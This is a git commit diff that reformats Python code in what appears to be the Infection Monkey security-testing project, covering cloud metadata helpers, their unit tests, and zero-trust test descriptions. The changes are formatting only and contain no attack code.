Fixed screwed up formatting with black

This commit is contained in:
VakarisZ 2021-04-07 11:13:49 +03:00 committed by Mike Salvatore
parent 03bcfc97af
commit 3149dcc8ec
329 changed files with 5482 additions and 5603 deletions

View File

@ -48,8 +48,7 @@ class AwsInstance(CloudInstance):
try: try:
self.account_id = self._extract_account_id( self.account_id = self._extract_account_id(
requests.get( requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
timeout=2
).text ).text
) )
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e: except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:

View File

@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response): def filter_instance_data_from_aws_response(response):
return [ return [
{ {
"instance_id":x[INSTANCE_ID_KEY], "instance_id": x[INSTANCE_ID_KEY],
"name":x[COMPUTER_NAME_KEY], "name": x[COMPUTER_NAME_KEY],
"os":x[PLATFORM_TYPE_KEY].lower(), "os": x[PLATFORM_TYPE_KEY].lower(),
"ip_address":x[IP_ADDRESS_KEY], "ip_address": x[IP_ADDRESS_KEY],
} }
for x in response[INSTANCE_INFORMATION_LIST_KEY] for x in response[INSTANCE_INFORMATION_LIST_KEY]
] ]

View File

@ -38,8 +38,8 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance( def get_test_aws_instance(
text={"instance_id":None, "region":None, "account_id":None}, text={"instance_id": None, "region": None, "account_id": None},
exception={"instance_id":None, "region":None, "account_id":None}, exception={"instance_id": None, "region": None, "account_id": None},
): ):
with requests_mock.Mocker() as m: with requests_mock.Mocker() as m:
# request made to get instance_id # request made to get instance_id
@ -67,9 +67,9 @@ def get_test_aws_instance(
def good_data_mock_instance(): def good_data_mock_instance():
return get_test_aws_instance( return get_test_aws_instance(
text={ text={
"instance_id":INSTANCE_ID_RESPONSE, "instance_id": INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE, "region": AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE, "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
} }
) )
@ -99,9 +99,9 @@ def test_get_account_id_good_data(good_data_mock_instance):
def bad_region_data_mock_instance(): def bad_region_data_mock_instance():
return get_test_aws_instance( return get_test_aws_instance(
text={ text={
"instance_id":INSTANCE_ID_RESPONSE, "instance_id": INSTANCE_ID_RESPONSE,
"region":"in-a-different-world", "region": "in-a-different-world",
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE, "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
} }
) )
@ -131,9 +131,9 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
def bad_account_id_data_mock_instance(): def bad_account_id_data_mock_instance():
return get_test_aws_instance( return get_test_aws_instance(
text={ text={
"instance_id":INSTANCE_ID_RESPONSE, "instance_id": INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE, "region": AVAILABILITY_ZONE_RESPONSE,
"account_id":"who-am-i", "account_id": "who-am-i",
} }
) )
@ -163,11 +163,11 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
def bad_instance_id_request_mock_instance(instance_id_exception): def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance( return get_test_aws_instance(
text={ text={
"instance_id":None, "instance_id": None,
"region":AVAILABILITY_ZONE_RESPONSE, "region": AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE, "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}, },
exception={"instance_id":instance_id_exception, "region":None, "account_id":None}, exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
) )
@ -201,11 +201,11 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
def bad_region_request_mock_instance(region_exception): def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance( return get_test_aws_instance(
text={ text={
"instance_id":INSTANCE_ID_RESPONSE, "instance_id": INSTANCE_ID_RESPONSE,
"region":None, "region": None,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE, "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}, },
exception={"instance_id":None, "region":region_exception, "account_id":None}, exception={"instance_id": None, "region": region_exception, "account_id": None},
) )
@ -239,11 +239,11 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
def bad_account_id_request_mock_instance(account_id_exception): def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance( return get_test_aws_instance(
text={ text={
"instance_id":INSTANCE_ID_RESPONSE, "instance_id": INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE, "region": AVAILABILITY_ZONE_RESPONSE,
"account_id":None, "account_id": None,
}, },
exception={"instance_id":None, "region":None, "account_id":account_id_exception}, exception={"instance_id": None, "region": None, "account_id": account_id_exception},
) )

View File

@ -54,5 +54,5 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
) )
self.assertEqual( self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)), filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}], [{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
) )

View File

@ -9,8 +9,7 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30" LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = ( AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" % "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
LATEST_AZURE_METADATA_API_VERSION
) )
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -41,7 +40,7 @@ class AzureInstance(CloudInstance):
try: try:
response = requests.get( response = requests.get(
AZURE_METADATA_SERVICE_URL, AZURE_METADATA_SERVICE_URL,
headers={"Metadata":"true"}, headers={"Metadata": "true"},
timeout=SHORT_REQUEST_TIMEOUT, timeout=SHORT_REQUEST_TIMEOUT,
) )

View File

@ -7,96 +7,96 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment from common.cloud.environment_names import Environment
GOOD_DATA = { GOOD_DATA = {
"compute":{ "compute": {
"azEnvironment":"AZUREPUBLICCLOUD", "azEnvironment": "AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm":"true", "isHostCompatibilityLayerVm": "true",
"licenseType":"Windows_Client", "licenseType": "Windows_Client",
"location":"westus", "location": "westus",
"name":"examplevmname", "name": "examplevmname",
"offer":"Windows", "offer": "Windows",
"osProfile":{ "osProfile": {
"adminUsername":"admin", "adminUsername": "admin",
"computerName":"examplevmname", "computerName": "examplevmname",
"disablePasswordAuthentication":"true", "disablePasswordAuthentication": "true",
}, },
"osType":"linux", "osType": "linux",
"placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a", "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"}, "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
"platformFaultDomain":"36", "platformFaultDomain": "36",
"platformUpdateDomain":"42", "platformUpdateDomain": "42",
"publicKeys":[ "publicKeys": [
{"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"}, {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
{"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"}, {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
], ],
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group", "publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23", "resourceGroupName": "macikgo-test-may-23",
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test" "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/" "-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname", "providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"}, "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
"sku":"Windows-Server-2012-R2-Datacenter", "sku": "Windows-Server-2012-R2-Datacenter",
"storageProfile":{ "storageProfile": {
"dataDisks":[ "dataDisks": [
{ {
"caching":"None", "caching": "None",
"createOption":"Empty", "createOption": "Empty",
"diskSizeGB":"1024", "diskSizeGB": "1024",
"image":{"uri":""}, "image": {"uri": ""},
"lun":"0", "lun": "0",
"managedDisk":{ "managedDisk": {
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/" "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/" "resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampledatadiskname", "Microsoft.Compute/disks/exampledatadiskname",
"storageAccountType":"Standard_LRS", "storageAccountType": "Standard_LRS",
}, },
"name":"exampledatadiskname", "name": "exampledatadiskname",
"vhd":{"uri":""}, "vhd": {"uri": ""},
"writeAcceleratorEnabled":"false", "writeAcceleratorEnabled": "false",
} }
], ],
"imageReference":{ "imageReference": {
"id":"", "id": "",
"offer":"UbuntuServer", "offer": "UbuntuServer",
"publisher":"Canonical", "publisher": "Canonical",
"sku":"16.04.0-LTS", "sku": "16.04.0-LTS",
"version":"latest", "version": "latest",
}, },
"osDisk":{ "osDisk": {
"caching":"ReadWrite", "caching": "ReadWrite",
"createOption":"FromImage", "createOption": "FromImage",
"diskSizeGB":"30", "diskSizeGB": "30",
"diffDiskSettings":{"option":"Local"}, "diffDiskSettings": {"option": "Local"},
"encryptionSettings":{"enabled":"false"}, "encryptionSettings": {"enabled": "false"},
"image":{"uri":""}, "image": {"uri": ""},
"managedDisk":{ "managedDisk": {
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/" "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/" "resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampleosdiskname", "Microsoft.Compute/disks/exampleosdiskname",
"storageAccountType":"Standard_LRS", "storageAccountType": "Standard_LRS",
}, },
"name":"exampleosdiskname", "name": "exampleosdiskname",
"osType":"Linux", "osType": "Linux",
"vhd":{"uri":""}, "vhd": {"uri": ""},
"writeAcceleratorEnabled":"false", "writeAcceleratorEnabled": "false",
}, },
}, },
"subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx", "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags":"baz:bash;foo:bar", "tags": "baz:bash;foo:bar",
"version":"15.05.22", "version": "15.05.22",
"vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6", "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName":"crpteste9vflji9", "vmScaleSetName": "crpteste9vflji9",
"vmSize":"Standard_A3", "vmSize": "Standard_A3",
"zone":"", "zone": "",
}, },
"network":{ "network": {
"interface":[ "interface": [
{ {
"ipv4":{ "ipv4": {
"ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}], "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
"subnet":[{"address":"10.144.133.128", "prefix":"26"}], "subnet": [{"address": "10.144.133.128", "prefix": "26"}],
}, },
"ipv6":{"ipAddress":[]}, "ipv6": {"ipAddress": []},
"macAddress":"0011AAFFBB22", "macAddress": "0011AAFFBB22",
} }
] ]
}, },
@ -113,7 +113,7 @@ javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n
"</body>\n</html>\n" "</body>\n</html>\n"
) )
BAD_DATA_JSON = {"":""} BAD_DATA_JSON = {"": ""}
def get_test_azure_instance(url, **kwargs): def get_test_azure_instance(url, **kwargs):

View File

@ -39,7 +39,7 @@ class AwsCmdRunner(CmdRunner):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript" doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command( command_res = self.ssm.send_command(
DocumentName=doc_name, DocumentName=doc_name,
Parameters={"commands":[command_line]}, Parameters={"commands": [command_line]},
InstanceIds=[self.instance_id], InstanceIds=[self.instance_id],
) )
return command_res["Command"]["CommandId"] return command_res["Command"]["CommandId"]

View File

@ -81,24 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication" PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging" PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = { PRINCIPLES = {
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your " PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your "
"" ""
"" ""
"network.", "network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.", PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.", PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint " PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint "
"security solutions.", "security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.", PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as " PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as "
"possible.", "possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources " PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources "
"should be MAC (Mandatory " "should be MAC (Mandatory "
"Access Control) only.", "Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster " PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster "
"recovery scenarios.", "recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.", PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.", PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
} }
POSSIBLE_STATUSES_KEY = "possible_statuses" POSSIBLE_STATUSES_KEY = "possible_statuses"
@ -107,206 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation" FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation" TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = { TESTS_MAP = {
TEST_SEGMENTATION:{ TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can " TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's " "communicate with from the machine it's "
"running on, that belong to different network segments.", "running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and" STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and"
" logs.", " logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, " STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.", "check firewall logs.",
}, },
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION, PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS], PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
}, },
TEST_MALICIOUS_ACTIVITY_TIMELINE:{ TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking " TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting " "actions, like scanning and attempting "
"exploitation.", "exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and " STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and "
"alerts." "alerts."
}, },
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS], PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
}, },
TEST_ENDPOINT_SECURITY_EXISTS:{ TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an " TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an "
"endpoint security software.", "endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and " STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus " "activate anti-virus "
"software on endpoints.", "software on endpoints.",
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to " STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a " "see if Monkey was a "
"security concern. ", "security concern. ",
}, },
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES], PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_MACHINE_EXPLOITED:{ TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to " TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.", "breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see " STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see " "activity recognized and see "
"which endpoints were compromised.", "which endpoints were compromised.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.", STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
}, },
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES], PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
}, },
TEST_SCHEDULED_EXECUTION:{ TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.", TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in " STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security " "User-Behavior security "
"software.", "software.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.", STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
}, },
PRINCIPLE_KEY:PRINCIPLE_USER_BEHAVIOUR, PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY:[PEOPLE, NETWORKS], PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
}, },
TEST_DATA_ENDPOINT_ELASTIC:{ TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to "
"ElasticSearch instances.", "ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by " STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.", "encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such " STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts " "instances, look for alerts "
"that indicate attempts to access them. ", "that indicate attempts to access them. ",
}, },
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA], PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_DATA_ENDPOINT_HTTP:{ TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.", TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in" STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.", " in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, " STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate " "look for alerts that indicate "
"attempts to access them. ", "attempts to access them. ",
}, },
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA], PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_DATA_ENDPOINT_POSTGRESQL:{ TEST_DATA_ENDPOINT_POSTGRESQL: {
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.", TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting" STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.", " it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, " STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that " "look for alerts that "
"indicate attempts to access them. ", "indicate attempts to access them. ",
}, },
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA], PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_TUNNELING:{ TEST_TUNNELING: {
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.", TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies " STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - " "are too permissive - "
"restrict them. " "restrict them. "
}, },
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS], PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
}, },
TEST_COMMUNICATE_AS_NEW_USER:{ TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate " TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate "
"with the internet from it.", "with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies " STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies "
"are too permissive - " "are too permissive - "
"restrict them to MAC only.", "restrict them to MAC only.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.", STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
}, },
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, NETWORKS, VISIBILITY_ANALYTICS], PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES:{ TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
TEST_EXPLANATION_KEY:"ScoutSuite assessed cloud firewall rules and settings.", TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found overly permissive firewall rules.", STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED:"ScoutSuite found no problems with cloud firewall rules.", STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
}, },
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS], PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{ TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.", TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.", STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.", STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
}, },
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA], PILLARS_KEY: [DATA],
